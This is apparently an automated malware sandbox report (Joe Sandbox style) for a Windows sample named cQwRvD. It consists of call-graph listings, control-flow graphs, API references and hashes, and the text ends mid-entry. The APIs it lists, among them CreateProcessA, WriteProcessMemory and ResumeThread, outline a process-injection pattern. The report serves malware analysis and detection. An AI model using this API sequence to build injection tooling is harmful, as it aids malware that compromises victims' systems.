47555->47557 47557->47482 47559 7604fe8 WriteProcessMemory 47558->47559 47561 760503f 47559->47561 47561->47482 47563 76052b1 CreateProcessA 47562->47563 47565 7605473 47563->47565 47567 76052b1 CreateProcessA 47566->47567 47569 7605473 47567->47569 47569->47569 47571 7604960 ResumeThread 47570->47571 47573 7604991 47571->47573 47573->47492 47575 7604921 ResumeThread 47574->47575 47577 7604991 47575->47577 47577->47492 47670 8f86f2c 47672 8f86d60 47670->47672 47671 8f86e1a 47672->47670 47672->47671 47675 8f88778 47672->47675 47682 8f88769 47672->47682 47676 8f8878d 47675->47676 47689 8f887c0 47676->47689 47699 8f88a70 47676->47699 47710 8f8889c 47676->47710 47720 8f887b1 47676->47720 47677 8f887a9 47677->47672 47683 8f8878d 47682->47683 47685 8f8889c PostMessageW 47683->47685 47686 8f88a70 PostMessageW 47683->47686 47687 8f887c0 PostMessageW 47683->47687 47688 8f887b1 PostMessageW 47683->47688 47684 8f887a9 47684->47672 47685->47684 47686->47684 47687->47684 47688->47684 47692 8f887e7 47689->47692 47690 8f88618 PostMessageW 47690->47692 47691 8f889b2 47693 8f88618 PostMessageW 47691->47693 47692->47690 47692->47691 47694 8f88822 47692->47694 47698 8f88828 47692->47698 47693->47698 47697 8f88618 PostMessageW 47694->47697 47694->47698 47696 8f8898e 47696->47677 47697->47698 47730 8f88618 47698->47730 47700 8f8880d 47699->47700 47704 8f88a7f 47699->47704 47701 8f88618 PostMessageW 47700->47701 47702 8f889b2 47700->47702 47705 8f88822 47700->47705 47709 8f88828 47700->47709 47701->47700 47703 8f88618 PostMessageW 47702->47703 47703->47709 47704->47677 47708 8f88618 PostMessageW 47705->47708 47705->47709 47706 8f88618 PostMessageW 47707 8f8898e 47706->47707 47707->47677 47708->47709 47709->47706 47713 8f8880d 47710->47713 47711 8f88618 PostMessageW 47711->47713 47712 8f889b2 47714 8f88618 PostMessageW 47712->47714 47713->47711 47713->47712 47715 8f88822 47713->47715 47719 8f88828 47713->47719 47714->47719 47718 8f88618 PostMessageW 47715->47718 47715->47719 47716 8f88618 PostMessageW 47717 8f8898e 47716->47717 47717->47677 47718->47719 47719->47716 47723 8f887e7 47720->47723 47721 8f88618 PostMessageW 47721->47723 47722 8f889b2 47724 8f88618 PostMessageW 47722->47724 47723->47721 47723->47722 47725 8f88822 47723->47725 47729 8f88828 47723->47729 47724->47729 47728 8f88618 PostMessageW 47725->47728 47725->47729 47726 8f88618 PostMessageW 47727 8f8898e 47726->47727 47727->47677 47728->47729 47729->47726 47731 8f88628 47730->47731 47732 8f8863b 47731->47732 47734 7608752 47731->47734 47732->47696 47735 760872b 47734->47735 47737 7608757 47734->47737 47735->47732 47736 76088eb 47736->47732 47737->47736 47739 7601bfc 47737->47739 47740 76089e0 PostMessageW 47739->47740 47741 7608a4a 47740->47741 47741->47737 47578 186d0c0 47579 186d0c5 GetCurrentProcess 47578->47579 47581 186d151 47579->47581 47582 186d158 GetCurrentThread 47579->47582 47581->47582 47583 186d195 GetCurrentProcess 47582->47583 47584 186d18e 47582->47584 47585 186d1cb 47583->47585 47584->47583 47586 186d1f3 GetCurrentThreadId 47585->47586 47587 186d224 47586->47587 47742 186d710 47743 186d715 DuplicateHandle 47742->47743 47744 186d7a6 47743->47744 47779 186ad30 47780 186ad31 47779->47780 47784 186ae18 47780->47784 47789 186ae28 47780->47789 47781 186ad3f 47786 186ae24 47784->47786 47785 186ae5c 47785->47781 47786->47785 47787 186b060 GetModuleHandleW 47786->47787 47788 186b08d 47787->47788 47788->47781 47792 186ae29 47789->47792 47790 186ae5c 47790->47781 47791 186b060 GetModuleHandleW 47793 186b08d 47791->47793 47792->47790 47792->47791 47793->47781 47758 1864668 47759 1864669 47758->47759 47760 1864686 47759->47760 47762 1864779 47759->47762 47763 186477c 47762->47763 47767 1864888 47763->47767 47771 1864878 47763->47771 47769 1864889 47767->47769 47768 186498c 47768->47768 47769->47768 47775 18644b0 47769->47775 47773 186487c 47771->47773 47772 186498c 47772->47772 47773->47772 47774 18644b0 CreateActCtxA 47773->47774 47774->47772 47776 1865918 CreateActCtxA 47775->47776 47778 18659db 47776->47778

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1068 8f87330-8f87351 1069 8f87358-8f87444 1068->1069 1070 8f87353 1068->1070 1072 8f8744a-8f8759b 1069->1072 1073 8f87c6c-8f87c94 1069->1073 1070->1069 1117 8f87c3a-8f87c69 1072->1117 1118 8f875a1-8f875fc 1072->1118 1076 8f88371-8f8837a 1073->1076 1077 8f88380-8f88397 1076->1077 1078 8f87ca2-8f87cab 1076->1078 1080 8f87cad 1078->1080 1081 8f87cb2-8f87da6 1078->1081 1080->1081 1099 8f87da8-8f87db4 1081->1099 1100 8f87dd0 1081->1100 1103 8f87dbe-8f87dc4 1099->1103 1104 8f87db6-8f87dbc 1099->1104 1102 8f87dd6-8f87df6 1100->1102 1109 8f87df8-8f87e51 1102->1109 1110 8f87e56-8f87ecc 1102->1110 1106 8f87dce 1103->1106 1104->1106 1106->1102 1122 8f8836e 1109->1122 1128 8f87ece-8f87f1f 1110->1128 1129 8f87f21-8f87f64 call 8f872e0 1110->1129 1117->1073 1126 8f875fe 1118->1126 1127 8f87601-8f8760c 1118->1127 1122->1076 1126->1127 1130 8f87b50-8f87b56 1127->1130 1155 8f87f6f-8f87f75 1128->1155 1129->1155 1132 8f87b5c-8f87bd9 1130->1132 1133 8f87611-8f8762f 1130->1133 1173 8f87c26-8f87c2c 1132->1173 1135 8f87631-8f87635 1133->1135 1136 8f87686-8f8769b 1133->1136 1135->1136 1141 8f87637-8f87642 1135->1141 1138 8f8769d 1136->1138 1139 8f876a2-8f876b8 1136->1139 1138->1139 1144 8f876ba 1139->1144 1145 8f876bf-8f876d6 1139->1145 1146 8f87678-8f8767e 1141->1146 1144->1145 1150 8f876d8 1145->1150 1151 8f876dd-8f876f3 1145->1151 1148 8f87680-8f87681 1146->1148 1149 8f87644-8f87648 1146->1149 1158 8f87704-8f87775 1148->1158 1153 8f8764a 1149->1153 1154 8f8764e-8f87666 1149->1154 1150->1151 1156 8f876fa-8f87701 1151->1156 1157 8f876f5 1151->1157 1153->1154 1161 8f87668 1154->1161 1162 8f8766d-8f87675 1154->1162 1163 8f87fcc-8f87fd8 1155->1163 1156->1158 1157->1156 1164 8f8778b-8f87903 1158->1164 1165 8f87777 1158->1165 1161->1162 1162->1146 1167 8f87fda-8f88062 1163->1167 1168 8f87f77-8f87f99 1163->1168 1174 8f87919-8f87a54 1164->1174 1175 8f87905 1164->1175 1165->1164 1166 8f87779-8f87785 1165->1166 1166->1164 1195 8f881e3-8f881ec 1167->1195 1170 8f87f9b 1168->1170 1171 8f87fa0-8f87fc9 1168->1171 1170->1171 1171->1163 1178 8f87bdb-8f87c23 1173->1178 1179 8f87c2e 1173->1179 1187 8f87ab8-8f87acd 1174->1187 1188 8f87a56-8f87a5a 1174->1188 1175->1174 1180 8f87907-8f87913 1175->1180 1178->1173 1179->1117 1180->1174 1192 8f87acf 1187->1192 1193 8f87ad4-8f87af5 1187->1193 1188->1187 1190 8f87a5c-8f87a6b 1188->1190 1194 8f87aaa-8f87ab0 1190->1194 1192->1193 1197 8f87afc-8f87b1b 1193->1197 1198 8f87af7 1193->1198 1203 8f87a6d-8f87a71 1194->1203 1204 8f87ab2-8f87ab3 1194->1204 1199 8f881f2-8f8824d 1195->1199 1200 8f88067-8f8807c 1195->1200 1201 8f87b1d 1197->1201 1202 8f87b22-8f87b42 1197->1202 1198->1197 1226 8f8824f-8f88282 1199->1226 1227 8f88284-8f882ae 1199->1227 1207 8f8807e 1200->1207 1208 8f88085-8f881d1 1200->1208 1201->1202 1209 8f87b49 1202->1209 1210 8f87b44 1202->1210 1205 8f87a7b-8f87a9c 1203->1205 1206 8f87a73-8f87a77 1203->1206 1211 8f87b4d 1204->1211 1213 8f87a9e 1205->1213 1214 8f87aa3-8f87aa7 1205->1214 1206->1205 1207->1208 1215 8f88158-8f88198 1207->1215 1216 8f8808b-8f880c9 1207->1216 1217 8f880ce-8f8810e 1207->1217 1218 8f88113-8f88153 1207->1218 1232 8f881dd 1208->1232 1209->1211 1210->1209 1211->1130 1213->1214 1214->1194 1215->1232 1216->1232 1217->1232 1218->1232 1235 8f882b7-8f88348 1226->1235 1227->1235 1232->1195 1239 8f8834f-8f88367 1235->1239 1239->1122
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'q$<ov!$TJq$Teq$pq$xbq
                                                                        • API String ID: 0-613785864
                                                                        • Opcode ID: 77b9b249942087fd7bded1461fa5239932276ec2872a3a2af7df1980c78c7702
                                                                        • Instruction ID: 1def6024fd9a67f9873ad60e67a8a493e9f77505f54d9ca1884f9e34d4f07e21
                                                                        • Opcode Fuzzy Hash: 77b9b249942087fd7bded1461fa5239932276ec2872a3a2af7df1980c78c7702
                                                                        • Instruction Fuzzy Hash: 7BB2CF75E00628CFDB64DF69C984BD9BBB2BF89304F1581E9D509AB225DB319E81CF40
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0998912a0e771ab4cda93fd488587537c348a5f59bd3c975b0dc59bba9320842
                                                                        • Instruction ID: 7279d1d73bd8cd0ab987a68d9cde61a5babacb0b3c4888abed71a804e871ba5c
                                                                        • Opcode Fuzzy Hash: 0998912a0e771ab4cda93fd488587537c348a5f59bd3c975b0dc59bba9320842
                                                                        • Instruction Fuzzy Hash: CF4117B5E04218CBDB08DFAAD9416AEFBF6EF88301F14C02AD819A7354EB305942CF40
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 992053681751950c0404a53b1985d54d56380128adbb83a9de23e3adec22239a
                                                                        • Instruction ID: 517041f0829351c673799f218f7e872a6e4dd508c44a5dbf1e34dc341eb4bac4
                                                                        • Opcode Fuzzy Hash: 992053681751950c0404a53b1985d54d56380128adbb83a9de23e3adec22239a
                                                                        • Instruction Fuzzy Hash: 54A002C4CEE401C0840D5C2041041B7C07C120B081D103924001B330D3C400D81744CD

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1541 186d0b1-186d0be 1542 186d0c5-186d14f GetCurrentProcess 1541->1542 1543 186d0c0-186d0c4 1541->1543 1547 186d151-186d157 1542->1547 1548 186d158-186d18c GetCurrentThread 1542->1548 1543->1542 1547->1548 1549 186d195-186d1c9 GetCurrentProcess 1548->1549 1550 186d18e-186d194 1548->1550 1551 186d1d2-186d1ed call 186d699 1549->1551 1552 186d1cb-186d1d1 1549->1552 1550->1549 1556 186d1f3-186d222 GetCurrentThreadId 1551->1556 1552->1551 1557 186d224-186d22a 1556->1557 1558 186d22b-186d28d 1556->1558 1557->1558
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 0186D13E
                                                                        • GetCurrentThread.KERNEL32 ref: 0186D17B
                                                                        • GetCurrentProcess.KERNEL32 ref: 0186D1B8
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0186D211
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1591008174.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1860000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: 08cd4e387e6f32c5a620a68d3e4bfde4bfefac575ce482e8ff13cdead757033c
                                                                        • Instruction ID: c58b265f0e0af0444ba763a9266ee53626950bcfae1039ffc00fcc20714b0cb1
                                                                        • Opcode Fuzzy Hash: 08cd4e387e6f32c5a620a68d3e4bfde4bfefac575ce482e8ff13cdead757033c
                                                                        • Instruction Fuzzy Hash: 4A5166B0A007098FEB14DFAAD448BAEFBF1EF48314F208059E418A7350DB745945CB66

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1565 186d0c0-186d14f GetCurrentProcess 1570 186d151-186d157 1565->1570 1571 186d158-186d18c GetCurrentThread 1565->1571 1570->1571 1572 186d195-186d1c9 GetCurrentProcess 1571->1572 1573 186d18e-186d194 1571->1573 1574 186d1d2-186d1ed call 186d699 1572->1574 1575 186d1cb-186d1d1 1572->1575 1573->1572 1579 186d1f3-186d222 GetCurrentThreadId 1574->1579 1575->1574 1580 186d224-186d22a 1579->1580 1581 186d22b-186d28d 1579->1581 1580->1581
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 0186D13E
                                                                        • GetCurrentThread.KERNEL32 ref: 0186D17B
                                                                        • GetCurrentProcess.KERNEL32 ref: 0186D1B8
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0186D211
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1591008174.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1860000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: ff8728ea6148efc43ae5d8e21c3c6bbbedafcb06f47c79b928217d351efdf490
                                                                        • Instruction ID: b9eeda3ae4dd0d564ab1019e7ccba054e40b7559738727e73291541b327d1c14
                                                                        • Opcode Fuzzy Hash: ff8728ea6148efc43ae5d8e21c3c6bbbedafcb06f47c79b928217d351efdf490
                                                                        • Instruction Fuzzy Hash: 275165B09007098FEB14DFAAD449B9EFBF1EB88310F208059E418A7350DB746945CB66

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1814 760521c-76052bd 1816 76052f6-7605316 1814->1816 1817 76052bf-76052c9 1814->1817 1822 7605318-7605322 1816->1822 1823 760534f-760537e 1816->1823 1817->1816 1818 76052cb-76052cd 1817->1818 1820 76052f0-76052f3 1818->1820 1821 76052cf-76052d9 1818->1821 1820->1816 1824 76052db 1821->1824 1825 76052dd-76052ec 1821->1825 1822->1823 1826 7605324-7605326 1822->1826 1833 7605380-760538a 1823->1833 1834 76053b7-7605471 CreateProcessA 1823->1834 1824->1825 1825->1825 1827 76052ee 1825->1827 1828 7605328-7605332 1826->1828 1829 7605349-760534c 1826->1829 1827->1820 1831 7605334 1828->1831 1832 7605336-7605345 1828->1832 1829->1823 1831->1832 1832->1832 1835 7605347 1832->1835 1833->1834 1836 760538c-760538e 1833->1836 1845 7605473-7605479 1834->1845 1846 760547a-7605500 1834->1846 1835->1829 1838 7605390-760539a 1836->1838 1839 76053b1-76053b4 1836->1839 1840 760539c 1838->1840 1841 760539e-76053ad 1838->1841 1839->1834 1840->1841 1841->1841 1842 76053af 1841->1842 1842->1839 1845->1846 1856 7605510-7605514 1846->1856 1857 7605502-7605506 1846->1857 1859 7605524-7605528 1856->1859 1860 7605516-760551a 1856->1860 1857->1856 1858 7605508 1857->1858 1858->1856 1862 7605538-760553c 1859->1862 1863 760552a-760552e 1859->1863 1860->1859 1861 760551c 1860->1861 1861->1859 1865 760554e-7605555 1862->1865 1866 760553e-7605544 1862->1866 1863->1862 1864 7605530 1863->1864 1864->1862 1867 7605557-7605566 1865->1867 1868 760556c 1865->1868 1866->1865 1867->1868 1870 760556d 1868->1870 1870->1870
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0760545E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 3262d4e59cc241fc46959e4dfdad4fc6a76866a8a1c3ff7ff9ae91e70b16807e
                                                                        • Instruction ID: b6510d79063d5f00d083ae770dbb409e4e842de3cb408a68b6ea7691d968a175
                                                                        • Opcode Fuzzy Hash: 3262d4e59cc241fc46959e4dfdad4fc6a76866a8a1c3ff7ff9ae91e70b16807e
                                                                        • Instruction Fuzzy Hash: 37A14FB1D0071ACFDB28DF68C841BDEBBB2BF44310F148569E80AA7281D7759995CF91

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1871 7605228-76052bd 1873 76052f6-7605316 1871->1873 1874 76052bf-76052c9 1871->1874 1879 7605318-7605322 1873->1879 1880 760534f-760537e 1873->1880 1874->1873 1875 76052cb-76052cd 1874->1875 1877 76052f0-76052f3 1875->1877 1878 76052cf-76052d9 1875->1878 1877->1873 1881 76052db 1878->1881 1882 76052dd-76052ec 1878->1882 1879->1880 1883 7605324-7605326 1879->1883 1890 7605380-760538a 1880->1890 1891 76053b7-7605471 CreateProcessA 1880->1891 1881->1882 1882->1882 1884 76052ee 1882->1884 1885 7605328-7605332 1883->1885 1886 7605349-760534c 1883->1886 1884->1877 1888 7605334 1885->1888 1889 7605336-7605345 1885->1889 1886->1880 1888->1889 1889->1889 1892 7605347 1889->1892 1890->1891 1893 760538c-760538e 1890->1893 1902 7605473-7605479 1891->1902 1903 760547a-7605500 1891->1903 1892->1886 1895 7605390-760539a 1893->1895 1896 76053b1-76053b4 1893->1896 1897 760539c 1895->1897 1898 760539e-76053ad 1895->1898 1896->1891 1897->1898 1898->1898 1899 76053af 1898->1899 1899->1896 1902->1903 1913 7605510-7605514 1903->1913 1914 7605502-7605506 1903->1914 1916 7605524-7605528 1913->1916 1917 7605516-760551a 1913->1917 1914->1913 1915 7605508 1914->1915 1915->1913 1919 7605538-760553c 1916->1919 1920 760552a-760552e 1916->1920 1917->1916 1918 760551c 1917->1918 1918->1916 1922 760554e-7605555 1919->1922 1923 760553e-7605544 1919->1923 1920->1919 1921 7605530 1920->1921 1921->1919 1924 7605557-7605566 1922->1924 1925 760556c 1922->1925 1923->1922 1924->1925 1927 760556d 1925->1927 1927->1927
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0760545E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 4997181b0eca62fe256c15ee5b749f2f52c662c46e5da8561a93001b9b21d628
                                                                        • Instruction ID: 95df8f09c9c11729231e615fb388ebec9de21ffcd0bd2089f8185f70da52f7fa
                                                                        • Opcode Fuzzy Hash: 4997181b0eca62fe256c15ee5b749f2f52c662c46e5da8561a93001b9b21d628
                                                                        • Instruction Fuzzy Hash: 39914EB1D0071A8FDB28DF68C841B9EBBB2BF44310F148569E80AA7281DB759995CF91

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1928 186ae28-186ae37 1930 186ae63-186ae67 1928->1930 1931 186ae39-186ae46 call 186a14c 1928->1931 1932 186ae7b-186aebc 1930->1932 1933 186ae69-186ae73 1930->1933 1938 186ae5c 1931->1938 1939 186ae48 1931->1939 1940 186aebe-186aec6 1932->1940 1941 186aec9-186aed7 1932->1941 1933->1932 1938->1930 1992 186ae4e call 186b0b0 1939->1992 1993 186ae4e call 186b0c0 1939->1993 1940->1941 1942 186aefb-186aefd 1941->1942 1943 186aed9-186aede 1941->1943 1946 186af00-186af07 1942->1946 1947 186aee0-186aee7 call 186a158 1943->1947 1948 186aee9 1943->1948 1944 186ae54-186ae56 1944->1938 1945 186af98-186afaf 1944->1945 1962 186afb1-186b010 1945->1962 1950 186af14-186af1b 1946->1950 1951 186af09-186af11 1946->1951 1949 186aeeb-186aef9 1947->1949 1948->1949 1949->1946 1953 186af1d-186af25 1950->1953 1954 186af28-186af31 call 186a168 1950->1954 1951->1950 1953->1954 1960 186af33-186af3b 1954->1960 1961 186af3e-186af43 1954->1961 1960->1961 1963 186af45-186af4c 1961->1963 1964 186af61-186af6e 1961->1964 1980 186b012 1962->1980 1963->1964 1965 186af4e-186af5e call 186a178 call 186a188 1963->1965 1969 186af70-186af8e 1964->1969 1970 186af91-186af97 1964->1970 1965->1964 1969->1970 1981 186b014 1980->1981 1982 186b019-186b01c 1980->1982 1983 186b016 1981->1983 1984 186b040-186b058 1981->1984 1985 186b01d-186b03e 1982->1985 1983->1985 1988 186b018 1983->1988 1986 186b060-186b08b GetModuleHandleW 1984->1986 1987 186b05a-186b05d 1984->1987 1985->1984 1989 186b094-186b0a8 1986->1989 1990 186b08d-186b093 1986->1990 1987->1986 1988->1982 1990->1989 1992->1944 1993->1944
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0186B07E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1591008174.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1860000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: df3e80d5f77c5d7223bf57ef5b809a39b1f6cb19d0dc2216a23da2c4e7318b63
                                                                        • Instruction ID: ad0983c227334a8dc9877e9917301dcc2d06f745ff6f2846d561f4e5de1c5351
                                                                        • Opcode Fuzzy Hash: df3e80d5f77c5d7223bf57ef5b809a39b1f6cb19d0dc2216a23da2c4e7318b63
                                                                        • Instruction Fuzzy Hash: F1816870A00B058FD728DF2AD44475ABBF9FF88304F00892DD19AE7A51D735EA46CB91

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1994 186590c-186590e 1995 1865915-1865916 1994->1995 1996 1865910 1994->1996 1997 186591d-18659d9 CreateActCtxA 1995->1997 1998 1865918-186591c 1995->1998 1996->1995 2000 18659e2-1865a3c 1997->2000 2001 18659db-18659e1 1997->2001 1998->1997 2008 1865a3e-1865a41 2000->2008 2009 1865a4b-1865a4f 2000->2009 2001->2000 2008->2009 2010 1865a60 2009->2010 2011 1865a51-1865a5d 2009->2011 2013 1865a61 2010->2013 2011->2010 2013->2013
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 018659C9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1591008174.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1860000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: fa01064d6701bee096f4f16c4132047a2c43931f8166d79be034e9b02e0ae14a
                                                                        • Instruction ID: f889af56faf5d573db0c0963437275221a9264a783e404a0d9555739ad3c634d
                                                                        • Opcode Fuzzy Hash: fa01064d6701bee096f4f16c4132047a2c43931f8166d79be034e9b02e0ae14a
                                                                        • Instruction Fuzzy Hash: CC41E2B1D0071DCBEB24DFAAC884B8DBBF5BF49314F20816AD508AB251DB756A46CF50
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 018659C9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1591008174.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1860000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: f1b2c80752a2764798430959fc029e7aea79ba17d45b9c9fd2aca18b9495f236
                                                                        • Instruction ID: 5d8864c7f6d6d96afe72bdb1af495c161e1fb39cbcdcd0f13cf1d49d3a4b51ff
                                                                        • Opcode Fuzzy Hash: f1b2c80752a2764798430959fc029e7aea79ba17d45b9c9fd2aca18b9495f236
                                                                        • Instruction Fuzzy Hash: FC41E2B1D0071DCBDB28DFA9C884B8DBBF5BF49314F20816AD408AB251DB756A46CF90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1596831225.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7610000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFromIconResource
                                                                        • String ID:
                                                                        • API String ID: 3668623891-0
                                                                        • Opcode ID: 72e4ff47739bdc80271aa11f9059c07076dc1997b11fe7da214ca3f952a9fcef
                                                                        • Instruction ID: 9a6ed69079cef1ff8d7faae1eef08420b65640e2072adc6faa6a572b776c2670
                                                                        • Opcode Fuzzy Hash: 72e4ff47739bdc80271aa11f9059c07076dc1997b11fe7da214ca3f952a9fcef
                                                                        • Instruction Fuzzy Hash: 1D317A769043899FCB12CFA9C804A9EBFF4EF09311F18845AE954A7261C336D855CFA1
                                                                        APIs
                                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0761D885,?,?), ref: 0761D937
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1596831225.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7610000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: DrawText
                                                                        • String ID:
                                                                        • API String ID: 2175133113-0
                                                                        • Opcode ID: 80030cade4820f558c703161176211ca1ddd859c5413841ea7aa18421b37d768
                                                                        • Instruction ID: 73919f6863a216965c95a96c03bb87f283d37de6263d71d3837eefa07d7ad4a8
                                                                        • Opcode Fuzzy Hash: 80030cade4820f558c703161176211ca1ddd859c5413841ea7aa18421b37d768
                                                                        • Instruction Fuzzy Hash: 2131E4B5D0034A9FDB10DF9AD884A9EBBF4EB48310F54842AE919A7310D775A941CFA0
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07605030
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 076f6e7553ba708b42c6d73b8887809a72c55e626acc7ffa2eec20198048b1a6
                                                                        • Instruction ID: 04daa434c049d776581dc21f90d67a2da5cdd041b8d9ed0f3046486a3f9cb5ff
                                                                        • Opcode Fuzzy Hash: 076f6e7553ba708b42c6d73b8887809a72c55e626acc7ffa2eec20198048b1a6
                                                                        • Instruction Fuzzy Hash: 912155B5D003099FCB24CFA9C885BDEBBF1BF48310F10842AE919A7240D7799940CFA0
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07605030
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 058492bb49e7c2d85af9153e0dbd27c41615460edfc2fefea2429ead198973c3
                                                                        • Instruction ID: c9aaba3e7fd7294a49f0a907dbd00c337a1bb20a17c761cb56405accb7bd1208
                                                                        • Opcode Fuzzy Hash: 058492bb49e7c2d85af9153e0dbd27c41615460edfc2fefea2429ead198973c3
                                                                        • Instruction Fuzzy Hash: 002124B19003499FDB24CFA9C881BDEBBF5BF48310F50842AE919A7240D7799940CBA0
                                                                        APIs
                                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0761D885,?,?), ref: 0761D937
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1596831225.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7610000_cQwRvD.jbxd
                                                                        Similarity
